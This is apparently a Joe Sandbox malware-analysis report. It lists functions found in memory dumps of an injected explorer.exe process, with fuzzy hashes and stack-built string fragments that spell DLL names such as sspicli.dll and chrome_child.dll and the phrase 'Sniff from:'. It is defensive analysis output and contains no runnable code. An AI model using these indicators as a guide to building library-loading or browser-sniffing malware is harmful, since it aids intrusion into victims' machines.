Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: f642cb06bf924bf4dd09b25808e049e8e2277a7fe10c7c321f3ca7e22aed7a5b
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 20418234228B498BCBA5EF2498857EA73E5FF98345F40462E984ECB241EF34E54587C2

Function 0E87386F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 0E8738F4
4, xrefs: 0E8739E9
vers, xrefs: 0E8738E4
ion., xrefs: 0E8738EC
\, xrefs: 0E8739E0

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 12d42f95041c8a3117501ce9d8925e3613bade9c066f8962f4edf4fd990746db
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 4B416F30258B4C8BCB65EF2898557EBB7E5FB99301F40462E988EC7241EF30D9458783

Function 0E5A686F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 0E5A68F4
4, xrefs: 0E5A69E9
ion., xrefs: 0E5A68EC
vers, xrefs: 0E5A68E4
\, xrefs: 0E5A69E0

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: e389d822528f5de1b6ab9a53f262f5a69c6389ade7bd550bb9fbc18ec98981af
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: E2416031219B498FCBB5EF2498557EEB3E4FB98301F444A2E998EC7240EF70D9458782

Function 0E74B4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 0E74B50E
32.d, xrefs: 0E74B4DA
dll, xrefs: 0E74B51C
cli., xrefs: 0E74B515
user, xrefs: 0E74B4D3

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 0c7a058bfb2b6d120df4662bfe79ca75afd342d0920f04a8f7df09a7047ef705
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: B6417F71A19E0D8FCB54EF6880997ADB3E1FB68301F44456AA80ED7320DB71DD808BC6

Function 0BE374B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 0BE37515
user, xrefs: 0BE374D3
sspi, xrefs: 0BE3750E
32.d, xrefs: 0BE374DA
dll, xrefs: 0BE3751C

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: e074ef34f8161a43fab8d9fd4455db9772b881620b07b2c48a5ca89f2c02d40e
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: A9416C70A18E0D9FCB58EF688499BAE77E1FF58704F40516AA80ED7250DB31D990CB86

Function 104174B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

user, xrefs: 104174D3
dll, xrefs: 1041751C
cli., xrefs: 10417515
32.d, xrefs: 104174DA
sspi, xrefs: 1041750E

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: f828d2a5933ee2274554e12748b03c7a957ae8280c9453554f65579f7f00ba0b
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 9D416370A18E0D9FCB84EF68D0D57AD77F2FB58340F51416AA84EDB310DA34E9818B82

Function 0E8754B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 0E87550E
dll, xrefs: 0E87551C
user, xrefs: 0E8754D3
32.d, xrefs: 0E8754DA
cli., xrefs: 0E875515

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 1d7167218c8213070b46b6151236dc14322a263f4f45969ed7bd54d379251328
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 10414230A28F0D8FCB54EF98C0957AD77E2FB58300F54456AA84ED7250DA71D9418BC6

Function 0E5A84B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

dll, xrefs: 0E5A851C
cli., xrefs: 0E5A8515
sspi, xrefs: 0E5A850E
user, xrefs: 0E5A84D3
32.d, xrefs: 0E5A84DA

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: a26f4ea101803a2046fcd653baf66c42bc15ab147756fbdcffa35c00f32fafb8
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 50415070A18E0D9FCB58FF5890997AD77E1FB5C300F48496A9D0AD7210DA70D9818B86

Function 0E749432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 0E74952A
h, xrefs: 0E74951F
.dll, xrefs: 0E74953F
el32, xrefs: 0E749537

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 47046bbb0189a83e9a019cd622fd1cc32954c40f3834281930dc7e2a15b32307
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: F84140B0608B4D8FD7A9DF29C4983ABF7E1FB98300F144A6E959AC3265DB70C945CB41

Function 0BE35432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 0BE3552A
h, xrefs: 0BE3551F
el32, xrefs: 0BE35537
.dll, xrefs: 0BE3553F

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: d60fb2816cd75d46e4896c7516633d5fdb4ca2a1194ba9795a726428216d74e1
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 8B419370A08B488FD7A8DF2880893AAB7E1FBA8305F105A2F949EC7255DF70D545CB81

Function 10415432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 1041552A
.dll, xrefs: 1041553F
h, xrefs: 1041551F
el32, xrefs: 10415537

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: d0ab264ea0fa1c56a57ccf22c3d5419f329fd2bc99d99155cd529944b4b86252
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: DF41B570608B49CFD794DF2880C43AABBE2FB98304F14066E949EC7255DF74E485CB85

Function 0E873432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

el32, xrefs: 0E873537
kern, xrefs: 0E87352A
h, xrefs: 0E87351F
.dll, xrefs: 0E87353F

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: a3f073d46ddfcf012112110633f856f411655c79a13dd435a14e0c29006703a1
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 11417F70618B4C8FD769DF6D84843AAB7E1FB98304F104A6E95DEC32A5DB70C945CB82

Function 0E5A6432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E5A653F
kern, xrefs: 0E5A652A
el32, xrefs: 0E5A6537
h, xrefs: 0E5A651F

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 9e555329a1bb72ff55463dde58e1edc3600b807f336f627a644a1705d967319a
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 07417170608B498FD7A9DF2884943BAB7E1FB98300F584E2E959EC3259DB70C945CB81

Function 0E7500B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 0E75013D
Snif, xrefs: 0E750154
om:, xrefs: 0E750146
, xrefs: 0E750184

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 2a200094e8d10ad112a3acc1a6d6942a36dc47525c5150be1e00cdd7867afa18
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 1F319371508B886FD719EF64C4886DAB7D4FB94300F504D1ED89B87361EA70A945CB42

Function 0BE3C0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 0BE3C146
, xrefs: 0BE3C184
f fr, xrefs: 0BE3C13D
Snif, xrefs: 0BE3C154

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 8741ff17e279254cc58eabdf19d45500db8bb03f8817933f4282e5b5ac8dcc6f
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 8931E13150CB885FC71AEB28D4856EABBD0FB84300F50591EE49BD7252EF30A549CB43

Function 1041C0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 1041C13D
om:, xrefs: 1041C146
, xrefs: 1041C184
Snif, xrefs: 1041C154

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 3e8ab005ac37acab74ae8eb51ca31eb708ec6d9f79edf4c0a3a0564f0dfc400d
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: ED31E13551CB886FC71ADB28E4856EAB7D0FB94300F90491EE49BD7252EE34B54ACB42

Function 0E87A0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 0E87A146
Snif, xrefs: 0E87A154
, xrefs: 0E87A184
f fr, xrefs: 0E87A13D

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 1ba81f7c45e591b4de6a30378abef3fc5268e99a009325b150ddc5aafee2d031
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 51319E71519B886FD71AEB28C4846DABBD4FB94300F504D5EE4DBC7291EA30E94ACA43

Function 0E5AD0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

om:, xrefs: 0E5AD146
Snif, xrefs: 0E5AD154
f fr, xrefs: 0E5AD13D
, xrefs: 0E5AD184

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 13e0a5c6e29ec4fb8270ceeb10eff7d4cc2664a9287df5194431d478accea3f9
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: F031F03151CB886FD71AEB28C0846EAB7D4FB94300F504D1EE59BC7251EE30A94ACB43

Function 0E7500C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 0E75013D
Snif, xrefs: 0E750154
om:, xrefs: 0E750146
, xrefs: 0E750184

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: d3c08a3b2265f55c3ea170706ccb26a184bf234ed87cebedc9a401c7a11ed638
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: D731BE72508B486FD719EF68C4896EAB7D4FB94300F504D1EE89BC7361EE70A9468B43

Function 0BE3C0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 0BE3C146
, xrefs: 0BE3C184
f fr, xrefs: 0BE3C13D
Snif, xrefs: 0BE3C154

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 558385ef1658a189414e9e02c31f80e8a629ae5abb1639bdc8392d5abfafa6ae
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: A531F271508B486FD719EF28D4856EAB7D4FB94300F50592EE49BD3252EF30E54ACA43

Function 1041C0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 1041C13D
om:, xrefs: 1041C146
, xrefs: 1041C184
Snif, xrefs: 1041C154

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 98e0a6ac201065f59487292a7178ca6493b5a9e09906b4a2901def2429c8aad9
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: D1310135518B486FC319DB28E4C56EAB3D0FB94300F80491EF49BD7252EE34F54ACA42

Function 0E87A0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 0E87A146
Snif, xrefs: 0E87A154
, xrefs: 0E87A184
f fr, xrefs: 0E87A13D

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: e97fca2dfe58eaf07ee0eb1e613a48ed297667d1a6b498f6285451afd52f1f03
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 37318171518B486FD71AEB28C484AEAB7D5FB94300F504D1EE4EBC7295EE30E946CA43

Function 0E5AD0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

om:, xrefs: 0E5AD146
Snif, xrefs: 0E5AD154
f fr, xrefs: 0E5AD13D
, xrefs: 0E5AD184

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: c8268c2759c1dd416d7228b480a78e4480e3cac18b2a2edbdf3d00726f416fb5
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 6931BE71518B486FD75AEB28C4846EAB7E4FBD4300F504D1EE59BC7251EA30A94ACB42

Function 0E74BFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E74BFFE
chro, xrefs: 0E74C023
me_c, xrefs: 0E74BFEE
hild, xrefs: 0E74BFF6

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 97e221c7d9449f31132ea6ae463cfed6861c4c3124cfecf0f74ba4f2a3fb5d2c
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 1C317E71518B088FD785EF689498BAAB7E1FB98300F840A2D984ACB365DF30C945CB52

Function 0BE37FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

me_c, xrefs: 0BE37FEE
hild, xrefs: 0BE37FF6
chro, xrefs: 0BE38023
.dll, xrefs: 0BE37FFE

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 25047ecdc2eaf836d10474259de4e636d3a81389998ddb427794d05e6d68afff
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: DE319E30118B584FCB84EF689499BAAB7E1FFD8600F94662DA44EDB254DF30C945CB82

Function 10417FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

hild, xrefs: 10417FF6
.dll, xrefs: 10417FFE
chro, xrefs: 10418023
me_c, xrefs: 10417FEE

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 407e0862148b20767c6f351e863c9b6b6d5329ed23418ae590569c0deba8eae0
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 0C317E74218B484FC784EF2894D5BAAB7E1FBD8204F81466DA84ECB215DF34E945C752

Function 0E875FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E875FFE
hild, xrefs: 0E875FF6
me_c, xrefs: 0E875FEE
chro, xrefs: 0E876023

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: e4ce3df83a18760981dd94d9b781562057a97c123e9b3046a387b5af1f97be27
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: FE314D70218B588FC784EF698494BAAB7E1FBD8200F944A6D988EDB255DF30C9458753

Function 0E5A8FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E5A8FFE
chro, xrefs: 0E5A9023
me_c, xrefs: 0E5A8FEE
hild, xrefs: 0E5A8FF6

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 22110434372de1731892f55c5464da4d3df72870093fea6484b1e51b12fb969d
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 14316D30118B194FCB84EF689495BAEB7E1FBD8300F984E2DA64ECB265DF30C9058752

Function 0E74BFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E74BFFE
chro, xrefs: 0E74C023
me_c, xrefs: 0E74BFEE
hild, xrefs: 0E74BFF6

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: b527004852b10db397b7a58c1d3d8fe7231d68fbce46f2f18c505a5ae302b189
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: A7318271118B088FC795EF689498BAAB7E1FF98300F944A2D984ACB365DF30CD45CB56

Function 0BE37FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

me_c, xrefs: 0BE37FEE
hild, xrefs: 0BE37FF6
chro, xrefs: 0BE38023
.dll, xrefs: 0BE37FFE

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: d6895b7eabba87c67e92c655c745a32e5e6cec2ed484c8757ac3ec2607967d53
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 0431BE30118B184FCB84EF689499BAAB7E1FFD8700F94663DA44ADB254CF30C945CB82

Function 10417FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

hild, xrefs: 10417FF6
.dll, xrefs: 10417FFE
chro, xrefs: 10418023
me_c, xrefs: 10417FEE

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
